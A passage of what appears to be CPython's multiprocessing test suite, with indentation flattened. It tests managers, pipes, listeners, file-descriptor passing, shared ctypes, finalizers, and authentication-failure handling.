self.assertEqual(foo._callmethod('f'), 'f()')
self.assertRaises(RemoteError, foo._callmethod, '_h')
self.assertEqual(bar.f(), 'f()')
self.assertEqual(bar._h(), '_h()')
self.assertEqual(bar._callmethod('f'), 'f()')
self.assertEqual(bar._callmethod('_h'), '_h()')
self.assertEqual(list(baz), [i*i for i in range(10)])
#
# Test of connecting to a remote server and using xmlrpclib for serialization
#
_queue = pyqueue.Queue()
def get_queue():
return _queue
class QueueManager(BaseManager):
'''manager class used by server process'''
QueueManager.register('get_queue', callable=get_queue)
class QueueManager2(BaseManager):
'''manager class which specifies the same interface as QueueManager'''
QueueManager2.register('get_queue')
SERIALIZER = 'xmlrpclib'
class _TestRemoteManager(BaseTestCase):
ALLOWED_TYPES = ('manager',)
values = ['hello world', None, True, 2.25,
'hall\xe5 v\xe4rlden',
'\u043f\u0440\u0438\u0432\u0456\u0442 \u0441\u0432\u0456\u0442',
b'hall\xe5 v\xe4rlden',
]
result = values[:]
@classmethod
def _putter(cls, address, authkey):
manager = QueueManager2(
address=address, authkey=authkey, serializer=SERIALIZER
)
manager.connect()
queue = manager.get_queue()
        # Note that xmlrpclib will deserialize the tuple as a list, not a tuple
queue.put(tuple(cls.values))
def test_remote(self):
authkey = os.urandom(32)
manager = QueueManager(
address=(test.support.HOST, 0), authkey=authkey, serializer=SERIALIZER
)
manager.start()
p = self.Process(target=self._putter, args=(manager.address, authkey))
p.daemon = True
p.start()
manager2 = QueueManager2(
address=manager.address, authkey=authkey, serializer=SERIALIZER
)
manager2.connect()
queue = manager2.get_queue()
self.assertEqual(queue.get(), self.result)
# Because we are using xmlrpclib for serialization instead of
# pickle this will cause a serialization error.
self.assertRaises(Exception, queue.put, time.sleep)
# Make queue finalizer run before the server is stopped
del queue
manager.shutdown()
class _TestManagerRestart(BaseTestCase):
@classmethod
def _putter(cls, address, authkey):
manager = QueueManager(
address=address, authkey=authkey, serializer=SERIALIZER)
manager.connect()
queue = manager.get_queue()
queue.put('hello world')
def test_rapid_restart(self):
authkey = os.urandom(32)
manager = QueueManager(
address=(test.support.HOST, 0), authkey=authkey, serializer=SERIALIZER)
srvr = manager.get_server()
addr = srvr.address
# Close the connection.Listener socket which gets opened as a part
# of manager.get_server(). It's not needed for the test.
srvr.listener.close()
manager.start()
p = self.Process(target=self._putter, args=(manager.address, authkey))
p.daemon = True
p.start()
queue = manager.get_queue()
self.assertEqual(queue.get(), 'hello world')
del queue
manager.shutdown()
manager = QueueManager(
address=addr, authkey=authkey, serializer=SERIALIZER)
try:
manager.start()
except OSError as e:
if e.errno != errno.EADDRINUSE:
raise
# Retry after some time, in case the old socket was lingering
# (sporadic failure on buildbots)
time.sleep(1.0)
manager = QueueManager(
address=addr, authkey=authkey, serializer=SERIALIZER)
manager.shutdown()
#
#
#
SENTINEL = latin('')
class _TestConnection(BaseTestCase):
ALLOWED_TYPES = ('processes', 'threads')
@classmethod
def _echo(cls, conn):
for msg in iter(conn.recv_bytes, SENTINEL):
conn.send_bytes(msg)
conn.close()
def test_connection(self):
conn, child_conn = self.Pipe()
p = self.Process(target=self._echo, args=(child_conn,))
p.daemon = True
p.start()
seq = [1, 2.25, None]
msg = latin('hello world')
longmsg = msg * 10
arr = array.array('i', list(range(4)))
if self.TYPE == 'processes':
self.assertEqual(type(conn.fileno()), int)
self.assertEqual(conn.send(seq), None)
self.assertEqual(conn.recv(), seq)
self.assertEqual(conn.send_bytes(msg), None)
self.assertEqual(conn.recv_bytes(), msg)
if self.TYPE == 'processes':
buffer = array.array('i', [0]*10)
expected = list(arr) + [0] * (10 - len(arr))
self.assertEqual(conn.send_bytes(arr), None)
self.assertEqual(conn.recv_bytes_into(buffer),
len(arr) * buffer.itemsize)
self.assertEqual(list(buffer), expected)
buffer = array.array('i', [0]*10)
expected = [0] * 3 + list(arr) + [0] * (10 - 3 - len(arr))
self.assertEqual(conn.send_bytes(arr), None)
self.assertEqual(conn.recv_bytes_into(buffer, 3 * buffer.itemsize),
len(arr) * buffer.itemsize)
self.assertEqual(list(buffer), expected)
buffer = bytearray(latin(' ' * 40))
self.assertEqual(conn.send_bytes(longmsg), None)
try:
res = conn.recv_bytes_into(buffer)
except multiprocessing.BufferTooShort as e:
self.assertEqual(e.args, (longmsg,))
else:
self.fail('expected BufferTooShort, got %s' % res)
poll = TimingWrapper(conn.poll)
self.assertEqual(poll(), False)
self.assertTimingAlmostEqual(poll.elapsed, 0)
self.assertEqual(poll(-1), False)
self.assertTimingAlmostEqual(poll.elapsed, 0)
self.assertEqual(poll(TIMEOUT1), False)
self.assertTimingAlmostEqual(poll.elapsed, TIMEOUT1)
conn.send(None)
time.sleep(.1)
self.assertEqual(poll(TIMEOUT1), True)
self.assertTimingAlmostEqual(poll.elapsed, 0)
self.assertEqual(conn.recv(), None)
        really_big_msg = latin('X') * (1024 * 1024 * 16)   # 16 MiB
conn.send_bytes(really_big_msg)
self.assertEqual(conn.recv_bytes(), really_big_msg)
conn.send_bytes(SENTINEL) # tell child to quit
child_conn.close()
if self.TYPE == 'processes':
self.assertEqual(conn.readable, True)
self.assertEqual(conn.writable, True)
self.assertRaises(EOFError, conn.recv)
self.assertRaises(EOFError, conn.recv_bytes)
p.join()
def test_duplex_false(self):
reader, writer = self.Pipe(duplex=False)
self.assertEqual(writer.send(1), None)
self.assertEqual(reader.recv(), 1)
if self.TYPE == 'processes':
self.assertEqual(reader.readable, True)
self.assertEqual(reader.writable, False)
self.assertEqual(writer.readable, False)
self.assertEqual(writer.writable, True)
self.assertRaises(OSError, reader.send, 2)
self.assertRaises(OSError, writer.recv)
self.assertRaises(OSError, writer.poll)
def test_spawn_close(self):
# We test that a pipe connection can be closed by parent
# process immediately after child is spawned. On Windows this
        # sometimes failed on older versions because
# child_conn would be closed before the child got a chance to
# duplicate it.
conn, child_conn = self.Pipe()
p = self.Process(target=self._echo, args=(child_conn,))
p.daemon = True
p.start()
child_conn.close() # this might complete before child initializes
msg = latin('hello')
conn.send_bytes(msg)
self.assertEqual(conn.recv_bytes(), msg)
conn.send_bytes(SENTINEL)
conn.close()
p.join()
def test_sendbytes(self):
if self.TYPE != 'processes':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
msg = latin('abcdefghijklmnopqrstuvwxyz')
a, b = self.Pipe()
a.send_bytes(msg)
self.assertEqual(b.recv_bytes(), msg)
a.send_bytes(msg, 5)
self.assertEqual(b.recv_bytes(), msg[5:])
a.send_bytes(msg, 7, 8)
self.assertEqual(b.recv_bytes(), msg[7:7+8])
a.send_bytes(msg, 26)
self.assertEqual(b.recv_bytes(), latin(''))
a.send_bytes(msg, 26, 0)
self.assertEqual(b.recv_bytes(), latin(''))
self.assertRaises(ValueError, a.send_bytes, msg, 27)
self.assertRaises(ValueError, a.send_bytes, msg, 22, 5)
self.assertRaises(ValueError, a.send_bytes, msg, 26, 1)
self.assertRaises(ValueError, a.send_bytes, msg, -1)
self.assertRaises(ValueError, a.send_bytes, msg, 4, -1)
@classmethod
def _is_fd_assigned(cls, fd):
try:
os.fstat(fd)
except OSError as e:
if e.errno == errno.EBADF:
return False
raise
else:
return True
@classmethod
def _writefd(cls, conn, data, create_dummy_fds=False):
if create_dummy_fds:
for i in range(0, 256):
if not cls._is_fd_assigned(i):
os.dup2(conn.fileno(), i)
fd = reduction.recv_handle(conn)
if msvcrt:
fd = msvcrt.open_osfhandle(fd, os.O_WRONLY)
os.write(fd, data)
os.close(fd)
@unittest.skipUnless(HAS_REDUCTION, "test needs multiprocessing.reduction")
def test_fd_transfer(self):
if self.TYPE != 'processes':
self.skipTest("only makes sense with processes")
conn, child_conn = self.Pipe(duplex=True)
p = self.Process(target=self._writefd, args=(child_conn, b"foo"))
p.daemon = True
p.start()
self.addCleanup(test.support.unlink, test.support.TESTFN)
with open(test.support.TESTFN, "wb") as f:
fd = f.fileno()
if msvcrt:
fd = msvcrt.get_osfhandle(fd)
reduction.send_handle(conn, fd, p.pid)
p.join()
with open(test.support.TESTFN, "rb") as f:
self.assertEqual(f.read(), b"foo")
@unittest.skipUnless(HAS_REDUCTION, "test needs multiprocessing.reduction")
@unittest.skipIf(sys.platform == "win32",
"test semantics don't make sense on Windows")
@unittest.skipIf(MAXFD <= 256,
"largest assignable fd number is too small")
@unittest.skipUnless(hasattr(os, "dup2"),
"test needs os.dup2()")
def test_large_fd_transfer(self):
# With fd > 256 (issue #11657)
if self.TYPE != 'processes':
self.skipTest("only makes sense with processes")
conn, child_conn = self.Pipe(duplex=True)
p = self.Process(target=self._writefd, args=(child_conn, b"bar", True))
p.daemon = True
p.start()
self.addCleanup(test.support.unlink, test.support.TESTFN)
with open(test.support.TESTFN, "wb") as f:
fd = f.fileno()
for newfd in range(256, MAXFD):
if not self._is_fd_assigned(newfd):
break
else:
self.fail("could not find an unassigned large file descriptor")
os.dup2(fd, newfd)
try:
reduction.send_handle(conn, newfd, p.pid)
finally:
os.close(newfd)
p.join()
with open(test.support.TESTFN, "rb") as f:
self.assertEqual(f.read(), b"bar")
@classmethod
    def _send_data_without_fd(cls, conn):
os.write(conn.fileno(), b"\0")
@unittest.skipUnless(HAS_REDUCTION, "test needs multiprocessing.reduction")
@unittest.skipIf(sys.platform == "win32", "doesn't make sense on Windows")
def test_missing_fd_transfer(self):
# Check that exception is raised when received data is not
# accompanied by a file descriptor in ancillary data.
if self.TYPE != 'processes':
self.skipTest("only makes sense with processes")
conn, child_conn = self.Pipe(duplex=True)
p = self.Process(target=self._send_data_without_fd, args=(child_conn,))
p.daemon = True
p.start()
self.assertRaises(RuntimeError, reduction.recv_handle, conn)
p.join()
def test_context(self):
a, b = self.Pipe()
with a, b:
a.send(1729)
self.assertEqual(b.recv(), 1729)
if self.TYPE == 'processes':
self.assertFalse(a.closed)
self.assertFalse(b.closed)
if self.TYPE == 'processes':
self.assertTrue(a.closed)
self.assertTrue(b.closed)
self.assertRaises(OSError, a.recv)
self.assertRaises(OSError, b.recv)
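# Illustrative sketch (not used by the tests): the Connection calls that
# _TestConnection above exercises.  send()/recv() pickle arbitrary objects,
# while send_bytes()/recv_bytes() move raw byte strings without pickling.
def _example_pipe_roundtrip():
    import multiprocessing
    a, b = multiprocessing.Pipe()
    a.send({'answer': 42})           # pickled object
    obj = b.recv()
    a.send_bytes(b'raw payload')     # raw bytes
    data = b.recv_bytes()
    a.close()
    b.close()
    return obj, data                 # ({'answer': 42}, b'raw payload')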
class _TestListener(BaseTestCase):
ALLOWED_TYPES = ('processes',)
def test_multiple_bind(self):
for family in self.connection.families:
l = self.connection.Listener(family=family)
self.addCleanup(l.close)
self.assertRaises(OSError, self.connection.Listener,
l.address, family)
def test_context(self):
with self.connection.Listener() as l:
with self.connection.Client(l.address) as c:
with l.accept() as d:
c.send(1729)
self.assertEqual(d.recv(), 1729)
if self.TYPE == 'processes':
self.assertRaises(OSError, l.accept)
class _TestListenerClient(BaseTestCase):
ALLOWED_TYPES = ('processes', 'threads')
@classmethod
def _test(cls, address):
conn = cls.connection.Client(address)
conn.send('hello')
conn.close()
def test_listener_client(self):
for family in self.connection.families:
l = self.connection.Listener(family=family)
p = self.Process(target=self._test, args=(l.address,))
p.daemon = True
p.start()
conn = l.accept()
self.assertEqual(conn.recv(), 'hello')
p.join()
l.close()
def test_issue14725(self):
l = self.connection.Listener()
p = self.Process(target=self._test, args=(l.address,))
p.daemon = True
p.start()
time.sleep(1)
        # On Windows the client process should by now have connected,
        # written its data and closed the pipe handle.  This causes
        # ConnectNamedPipe() to fail with ERROR_NO_DATA.  See Issue
        # 14725.
conn = l.accept()
self.assertEqual(conn.recv(), 'hello')
conn.close()
p.join()
l.close()
def test_issue16955(self):
for fam in self.connection.families:
l = self.connection.Listener(family=fam)
c = self.connection.Client(l.address)
a = l.accept()
a.send_bytes(b"hello")
self.assertTrue(c.poll(1))
a.close()
c.close()
l.close()
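# Minimal sketch (illustration only): the Listener/Client handshake that the
# listener tests above run across processes, here kept in one process by
# connecting from a background thread.
def _example_listener_client():
    import threading
    from multiprocessing.connection import Client, Listener
    with Listener(family='AF_INET') as listener:
        def _connect(address):
            with Client(address) as c:
                c.send('ping')
        t = threading.Thread(target=_connect, args=(listener.address,))
        t.start()
        with listener.accept() as server_side:
            message = server_side.recv()
        t.join()
    return message                   # 'ping'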
class _TestPoll(BaseTestCase):
ALLOWED_TYPES = ('processes', 'threads')
def test_empty_string(self):
a, b = self.Pipe()
self.assertEqual(a.poll(), False)
b.send_bytes(b'')
self.assertEqual(a.poll(), True)
self.assertEqual(a.poll(), True)
@classmethod
def _child_strings(cls, conn, strings):
for s in strings:
time.sleep(0.1)
conn.send_bytes(s)
conn.close()
def test_strings(self):
strings = (b'hello', b'', b'a', b'b', b'', b'bye', b'', b'lop')
a, b = self.Pipe()
p = self.Process(target=self._child_strings, args=(b, strings))
p.start()
for s in strings:
for i in range(200):
if a.poll(0.01):
break
x = a.recv_bytes()
self.assertEqual(s, x)
p.join()
@classmethod
def _child_boundaries(cls, r):
# Polling may "pull" a message in to the child process, but we
# don't want it to pull only part of a message, as that would
# corrupt the pipe for any other processes which might later
# read from it.
r.poll(5)
def test_boundaries(self):
r, w = self.Pipe(False)
p = self.Process(target=self._child_boundaries, args=(r,))
p.start()
time.sleep(2)
L = [b"first", b"second"]
for obj in L:
w.send_bytes(obj)
w.close()
p.join()
self.assertIn(r.recv_bytes(), L)
@classmethod
def _child_dont_merge(cls, b):
b.send_bytes(b'a')
b.send_bytes(b'b')
b.send_bytes(b'cd')
def test_dont_merge(self):
a, b = self.Pipe()
self.assertEqual(a.poll(0.0), False)
self.assertEqual(a.poll(0.1), False)
p = self.Process(target=self._child_dont_merge, args=(b,))
p.start()
self.assertEqual(a.recv_bytes(), b'a')
self.assertEqual(a.poll(1.0), True)
self.assertEqual(a.poll(1.0), True)
self.assertEqual(a.recv_bytes(), b'b')
self.assertEqual(a.poll(1.0), True)
self.assertEqual(a.poll(1.0), True)
self.assertEqual(a.poll(0.0), True)
self.assertEqual(a.recv_bytes(), b'cd')
p.join()
#
# Test of sending connection and socket objects between processes
#
@unittest.skipUnless(HAS_REDUCTION, "test needs multiprocessing.reduction")
class _TestPicklingConnections(BaseTestCase):
ALLOWED_TYPES = ('processes',)
@classmethod
def tearDownClass(cls):
from multiprocessing import resource_sharer
resource_sharer.stop(timeout=5)
@classmethod
def _listener(cls, conn, families):
for fam in families:
l = cls.connection.Listener(family=fam)
conn.send(l.address)
new_conn = l.accept()
conn.send(new_conn)
new_conn.close()
l.close()
l = socket.socket()
l.bind((test.support.HOST, 0))
l.listen()
conn.send(l.getsockname())
new_conn, addr = l.accept()
conn.send(new_conn)
new_conn.close()
l.close()
conn.recv()
@classmethod
def _remote(cls, conn):
for (address, msg) in iter(conn.recv, None):
client = cls.connection.Client(address)
client.send(msg.upper())
client.close()
address, msg = conn.recv()
client = socket.socket()
client.connect(address)
client.sendall(msg.upper())
client.close()
conn.close()
def test_pickling(self):
families = self.connection.families
lconn, lconn0 = self.Pipe()
lp = self.Process(target=self._listener, args=(lconn0, families))
lp.daemon = True
lp.start()
lconn0.close()
rconn, rconn0 = self.Pipe()
rp = self.Process(target=self._remote, args=(rconn0,))
rp.daemon = True
rp.start()
rconn0.close()
for fam in families:
msg = ('This connection uses family %s' % fam).encode('ascii')
address = lconn.recv()
rconn.send((address, msg))
new_conn = lconn.recv()
self.assertEqual(new_conn.recv(), msg.upper())
rconn.send(None)
msg = latin('This connection uses a normal socket')
address = lconn.recv()
rconn.send((address, msg))
new_conn = lconn.recv()
buf = []
while True:
s = new_conn.recv(100)
if not s:
break
buf.append(s)
buf = b''.join(buf)
self.assertEqual(buf, msg.upper())
new_conn.close()
lconn.send(None)
rconn.close()
lconn.close()
lp.join()
rp.join()
@classmethod
def child_access(cls, conn):
w = conn.recv()
w.send('all is well')
w.close()
r = conn.recv()
msg = r.recv()
conn.send(msg*2)
conn.close()
def test_access(self):
# On Windows, if we do not specify a destination pid when
# using DupHandle then we need to be careful to use the
# correct access flags for DuplicateHandle(), or else
# DupHandle.detach() will raise PermissionError. For example,
# for a read only pipe handle we should use
# access=FILE_GENERIC_READ. (Unfortunately
# DUPLICATE_SAME_ACCESS does not work.)
conn, child_conn = self.Pipe()
p = self.Process(target=self.child_access, args=(child_conn,))
p.daemon = True
p.start()
child_conn.close()
r, w = self.Pipe(duplex=False)
conn.send(w)
w.close()
self.assertEqual(r.recv(), 'all is well')
r.close()
r, w = self.Pipe(duplex=False)
conn.send(r)
r.close()
w.send('foobar')
w.close()
self.assertEqual(conn.recv(), 'foobar'*2)
#
#
#
class _TestHeap(BaseTestCase):
ALLOWED_TYPES = ('processes',)
def test_heap(self):
iterations = 5000
maxblocks = 50
blocks = []
# create and destroy lots of blocks of different sizes
for i in range(iterations):
size = int(random.lognormvariate(0, 1) * 1000)
b = multiprocessing.heap.BufferWrapper(size)
blocks.append(b)
if len(blocks) > maxblocks:
i = random.randrange(maxblocks)
del blocks[i]
# get the heap object
heap = multiprocessing.heap.BufferWrapper._heap
# verify the state of the heap
all = []
occupied = 0
heap._lock.acquire()
self.addCleanup(heap._lock.release)
for L in list(heap._len_to_seq.values()):
for arena, start, stop in L:
all.append((heap._arenas.index(arena), start, stop,
stop-start, 'free'))
for arena, start, stop in heap._allocated_blocks:
all.append((heap._arenas.index(arena), start, stop,
stop-start, 'occupied'))
occupied += (stop-start)
all.sort()
for i in range(len(all)-1):
(arena, start, stop) = all[i][:3]
(narena, nstart, nstop) = all[i+1][:3]
self.assertTrue((arena != narena and nstart == 0) or
(stop == nstart))
def test_free_from_gc(self):
# Check that freeing of blocks by the garbage collector doesn't deadlock
# (issue #12352).
# Make sure the GC is enabled, and set lower collection thresholds to
# make collections more frequent (and increase the probability of
# deadlock).
if not gc.isenabled():
gc.enable()
self.addCleanup(gc.disable)
thresholds = gc.get_threshold()
self.addCleanup(gc.set_threshold, *thresholds)
gc.set_threshold(10)
# perform numerous block allocations, with cyclic references to make
# sure objects are collected asynchronously by the gc
for i in range(5000):
a = multiprocessing.heap.BufferWrapper(1)
b = multiprocessing.heap.BufferWrapper(1)
# circular references
a.buddy = b
b.buddy = a
#
#
#
class _Foo(Structure):
_fields_ = [
('x', c_int),
('y', c_double)
]
class _TestSharedCTypes(BaseTestCase):
ALLOWED_TYPES = ('processes',)
def setUp(self):
if not HAS_SHAREDCTYPES:
self.skipTest("requires multiprocessing.sharedctypes")
@classmethod
def _double(cls, x, y, foo, arr, string):
x.value *= 2
y.value *= 2
foo.x *= 2
foo.y *= 2
string.value *= 2
for i in range(len(arr)):
arr[i] *= 2
def test_sharedctypes(self, lock=False):
x = Value('i', 7, lock=lock)
y = Value(c_double, 1.0/3.0, lock=lock)
foo = Value(_Foo, 3, 2, lock=lock)
arr = self.Array('d', list(range(10)), lock=lock)
string = self.Array('c', 20, lock=lock)
string.value = latin('hello')
p = self.Process(target=self._double, args=(x, y, foo, arr, string))
p.daemon = True
p.start()
p.join()
self.assertEqual(x.value, 14)
self.assertAlmostEqual(y.value, 2.0/3.0)
self.assertEqual(foo.x, 6)
self.assertAlmostEqual(foo.y, 4.0)
for i in range(10):
self.assertAlmostEqual(arr[i], i*2)
self.assertEqual(string.value, latin('hellohello'))
def test_synchronize(self):
self.test_sharedctypes(lock=True)
def test_copy(self):
foo = _Foo(2, 5.0)
bar = copy(foo)
foo.x = 0
foo.y = 0
self.assertEqual(bar.x, 2)
self.assertAlmostEqual(bar.y, 5.0)
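# Sketch (not executed here; needs _ctypes like the class above): sharing a
# ctypes Structure the way test_sharedctypes() does -- sharedctypes.Value
# accepts a Structure subclass followed by its constructor arguments and
# exposes the fields as synchronized attributes.
def _example_shared_structure():
    from multiprocessing.sharedctypes import Value as ShmValue
    point = ShmValue(_Foo, 3, 2.5)    # _Foo(x=3, y=2.5) in shared memory
    point.x *= 2
    return point.x, point.y           # (6, 2.5)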
#
#
#
class _TestFinalize(BaseTestCase):
ALLOWED_TYPES = ('processes',)
@classmethod
def _test_finalize(cls, conn):
class Foo(object):
pass
a = Foo()
util.Finalize(a, conn.send, args=('a',))
del a # triggers callback for a
b = Foo()
close_b = util.Finalize(b, conn.send, args=('b',))
close_b() # triggers callback for b
close_b() # does nothing because callback has already been called
del b # does nothing because callback has already been called
c = Foo()
util.Finalize(c, conn.send, args=('c',))
d10 = Foo()
util.Finalize(d10, conn.send, args=('d10',), exitpriority=1)
d01 = Foo()
util.Finalize(d01, conn.send, args=('d01',), exitpriority=0)
d02 = Foo()
util.Finalize(d02, conn.send, args=('d02',), exitpriority=0)
d03 = Foo()
util.Finalize(d03, conn.send, args=('d03',), exitpriority=0)
util.Finalize(None, conn.send, args=('e',), exitpriority=-10)
util.Finalize(None, conn.send, args=('STOP',), exitpriority=-100)
# call multiprocessing's cleanup function then exit process without
# garbage collecting locals
util._exit_function()
conn.close()
os._exit(0)
def test_finalize(self):
conn, child_conn = self.Pipe()
p = self.Process(target=self._test_finalize, args=(child_conn,))
p.daemon = True
p.start()
p.join()
result = [obj for obj in iter(conn.recv, 'STOP')]
self.assertEqual(result, ['a', 'b', 'd10', 'd03', 'd02', 'd01', 'e'])
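# Sketch (not run by the suite): the util.Finalize semantics test_finalize()
# depends on.  util._exit_function() runs callbacks with a higher exitpriority
# first, and callbacks sharing a priority run in reverse registration order,
# which is why 'd10' precedes 'd03', 'd02', 'd01' in the expected result.
# Calling a finalizer object directly, as close_b does above, fires it
# immediately and at most once.
def _example_finalize_registration():
    from multiprocessing import util as mp_util
    class Holder:
        pass
    holder = Holder()
    events = []
    finalizer = mp_util.Finalize(holder, events.append, args=('done',),
                                 exitpriority=5)
    finalizer()      # runs the callback now -> events == ['done']
    finalizer()      # second call is a no-op
    return events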
#
# Test that from ... import * works for each module
#
class _TestImportStar(unittest.TestCase):
def get_module_names(self):
import glob
folder = os.path.dirname(multiprocessing.__file__)
pattern = os.path.join(folder, '*.py')
files = glob.glob(pattern)
modules = [os.path.splitext(os.path.split(f)[1])[0] for f in files]
modules = ['multiprocessing.' + m for m in modules]
modules.remove('multiprocessing.__init__')
modules.append('multiprocessing')
return modules
def test_import(self):
modules = self.get_module_names()
if sys.platform == 'win32':
modules.remove('multiprocessing.popen_fork')
modules.remove('multiprocessing.popen_forkserver')
modules.remove('multiprocessing.popen_spawn_posix')
else:
modules.remove('multiprocessing.popen_spawn_win32')
if not HAS_REDUCTION:
modules.remove('multiprocessing.popen_forkserver')
if c_int is None:
# This module requires _ctypes
modules.remove('multiprocessing.sharedctypes')
for name in modules:
__import__(name)
mod = sys.modules[name]
self.assertTrue(hasattr(mod, '__all__'), name)
for attr in mod.__all__:
self.assertTrue(
hasattr(mod, attr),
'%r does not have attribute %r' % (mod, attr)
)
#
# Quick test that logging works -- does not test logging output
#
class _TestLogging(BaseTestCase):
ALLOWED_TYPES = ('processes',)
def test_enable_logging(self):
logger = multiprocessing.get_logger()
logger.setLevel(util.SUBWARNING)
self.assertTrue(logger is not None)
logger.debug('this will not be printed')
logger.info('nor will this')
logger.setLevel(LOG_LEVEL)
@classmethod
def _test_level(cls, conn):
logger = multiprocessing.get_logger()
conn.send(logger.getEffectiveLevel())
def test_level(self):
LEVEL1 = 32
LEVEL2 = 37
logger = multiprocessing.get_logger()
root_logger = logging.getLogger()
root_level = root_logger.level
reader, writer = multiprocessing.Pipe(duplex=False)
logger.setLevel(LEVEL1)
p = self.Process(target=self._test_level, args=(writer,))
p.daemon = True
p.start()
self.assertEqual(LEVEL1, reader.recv())
logger.setLevel(logging.NOTSET)
root_logger.setLevel(LEVEL2)
p = self.Process(target=self._test_level, args=(writer,))
p.daemon = True
p.start()
self.assertEqual(LEVEL2, reader.recv())
root_logger.setLevel(root_level)
logger.setLevel(level=LOG_LEVEL)
# class _TestLoggingProcessName(BaseTestCase):
#
# def handle(self, record):
# assert record.processName == multiprocessing.current_process().name
# self.__handled = True
#
# def test_logging(self):
# handler = logging.Handler()
# handler.handle = self.handle
# self.__handled = False
# # Bypass getLogger() and side-effects
# logger = logging.getLoggerClass()(
# 'multiprocessing.test.TestLoggingProcessName')
# logger.addHandler(handler)
# logger.propagate = False
#
# logger.warn('foo')
# assert self.__handled
#
# Check that Process.join() retries if os.waitpid() fails with EINTR
#
class _TestPollEintr(BaseTestCase):
ALLOWED_TYPES = ('processes',)
@classmethod
def _killer(cls, pid):
time.sleep(0.1)
os.kill(pid, signal.SIGUSR1)
@unittest.skipUnless(hasattr(signal, 'SIGUSR1'), 'requires SIGUSR1')
def test_poll_eintr(self):
got_signal = [False]
def record(*args):
got_signal[0] = True
pid = os.getpid()
oldhandler = signal.signal(signal.SIGUSR1, record)
try:
killer = self.Process(target=self._killer, args=(pid,))
killer.start()
try:
p = self.Process(target=time.sleep, args=(2,))
p.start()
p.join()
finally:
killer.join()
self.assertTrue(got_signal[0])
self.assertEqual(p.exitcode, 0)
finally:
signal.signal(signal.SIGUSR1, oldhandler)
#
# Test to verify handle verification, see issue 3321
#
class TestInvalidHandle(unittest.TestCase):
@unittest.skipIf(WIN32, "skipped on Windows")
def test_invalid_handles(self):
conn = multiprocessing.connection.Connection(44977608)
# check that poll() doesn't crash
try:
conn.poll()
except (ValueError, OSError):
pass
finally:
# Hack private attribute _handle to avoid printing an error
# in conn.__del__
conn._handle = None
self.assertRaises((ValueError, OSError),
multiprocessing.connection.Connection, -1)
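# Sketch (illustration only): the challenge/response handshake that OtherTest
# below breaks on purpose.  With a shared authkey, deliver_challenge() on one
# end and answer_challenge() on the other complete without raising
# AuthenticationError; both helpers are internal to multiprocessing.connection.
def _example_auth_handshake():
    import threading
    import multiprocessing
    from multiprocessing.connection import answer_challenge, deliver_challenge
    server, client = multiprocessing.Pipe()
    t = threading.Thread(target=answer_challenge, args=(client, b'secret'))
    t.start()
    deliver_challenge(server, b'secret')   # raises on a key mismatch
    t.join()
    server.close()
    client.close()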
class OtherTest(unittest.TestCase):
# TODO: add more tests for deliver/answer challenge.
def test_deliver_challenge_auth_failure(self):
class _FakeConnection(object):
def recv_bytes(self, size):
return b'something bogus'
def send_bytes(self, data):
pass
self.assertRaises(multiprocessing.AuthenticationError,
multiprocessing.connection.deliver_challenge,
_FakeConnection(), b'abc')
def test_answer_challenge_auth_failure(self):
class _FakeConnection(object):
def __init__(self):
self.count = 0
def recv_bytes(self, size):
self.count += 1
if self.count == 1:
return multiprocessing.connection.CHALLENGE
elif self.count == 2:
return b'something bogus'
return b''
def send_bytes(self, data):
pass
self.assertRaises(multiprocessing.AuthenticationError,
multiprocessing.connection.answer_challenge,
_FakeConnection(), b'abc')
#
# Test Manager.start()/Pool.__init__() initializer feature - see issue 5585
#
def initializer(ns):
ns.test += 1
class TestInitializers(unittest.TestCase):
def setUp(self):
self.mgr = multiprocessing.Manager()
self.ns = self.mgr.Namespace()
self.ns.test = 0
def tearDown(self):
self.mgr.shutdown()
self.mgr.join()
def test_manager_initializer(self):
m = multiprocessing.managers.SyncManager()
self.assertRaises(TypeError, m.start, 1)
m.start(initializer, (self.ns,))
self.assertEqual(self.ns.test, 1)
m.shutdown()
m.join()
def test_pool_initializer(self):
self.assertRaises(TypeError, multiprocessing.Pool, initializer=1)
p = multiprocessing.Pool(1, initializer, (self.ns,))
p.close()
p.join()
self.assertEqual(self.ns.test, 1)
#
# Issue 5155, 5313, 5331: Test process in processes
# Verifies os.close(sys.stdin.fileno) vs. sys.stdin.close() behavior
#
def _this_sub_process(q):
try:
item = q.get(block=False)
except pyqueue.Empty:
pass
def _test_process(q):
queue = multiprocessing.Queue()
subProc = multiprocessing.Process(target=_this_sub_process, args=(queue,))
subProc.daemon = True
subProc.start()
subProc.join()
def _afunc(x):
return x*x
def pool_in_process():
pool = multiprocessing.Pool(processes=4)
x = pool.map(_afunc, [1, 2, 3, 4, 5, 6, 7])
pool.close()
pool.join()
class _file_like(object):
def __init__(self, delegate):
self._delegate = delegate
self._pid = None
@property
def cache(self):
pid = os.getpid()
        # No race condition here: after a fork only the calling thread survives
        # in the child process.
if pid != self._pid:
self._pid = pid
self._cache = []
return self._cache
def write(self, data):
self.cache.append(data)
def flush(self):
self._delegate.write(''.join(self.cache))
self._cache = []
class TestStdinBadfiledescriptor(unittest.TestCase):
def test_queue_in_process(self):
queue = multiprocessing.Queue()
proc = multiprocessing.Process(target=_test_process, args=(queue,))
proc.start()
proc.join()
def test_pool_in_process(self):
p = multiprocessing.Process(target=pool_in_process)
p.start()
p.join()
def test_flushing(self):
sio = io.StringIO()
flike = _file_like(sio)
flike.write('foo')
proc = multiprocessing.Process(target=lambda: flike.flush())
flike.flush()
        self.assertEqual(sio.getvalue(), 'foo')
class TestWait(unittest.TestCase):
@classmethod
def _child_test_wait(cls, w, slow):
for i in range(10):
if slow:
time.sleep(random.random()*0.1)
w.send((i, os.getpid()))
w.close()
def test_wait(self, slow=False):
from multiprocessing.connection import wait
readers = []
procs = []
messages = []
for i in range(4):
r, w = multiprocessing.Pipe(duplex=False)
p = multiprocessing.Process(target=self._child_test_wait, args=(w, slow))
p.daemon = True
p.start()
w.close()
readers.append(r)
procs.append(p)
self.addCleanup(p.join)
while readers:
for r in wait(readers):
try:
msg = r.recv()
except EOFError:
readers.remove(r)
r.close()
else:
messages.append(msg)
messages.sort()
expected = sorted((i, p.pid) for i in range(10) for p in procs)
self.assertEqual(messages, expected)
@classmethod
def _child_test_wait_socket(cls, address, slow):
s = socket.socket()
s.connect(address)
for i in range(10):
if slow:
time.sleep(random.random()*0.1)
s.sendall(('%s\n' % i).encode('ascii'))
s.close()
def test_wait_socket(self, slow=False):
from multiprocessing.connection import wait
l = socket.socket()
l.bind((test.support.HOST, 0))
l.listen()
addr = l.getsockname()
readers = []
procs = []
dic = {}
for i in range(4):
p = multiprocessing.Process(target=self._child_test_wait_socket,
args=(addr, slow))
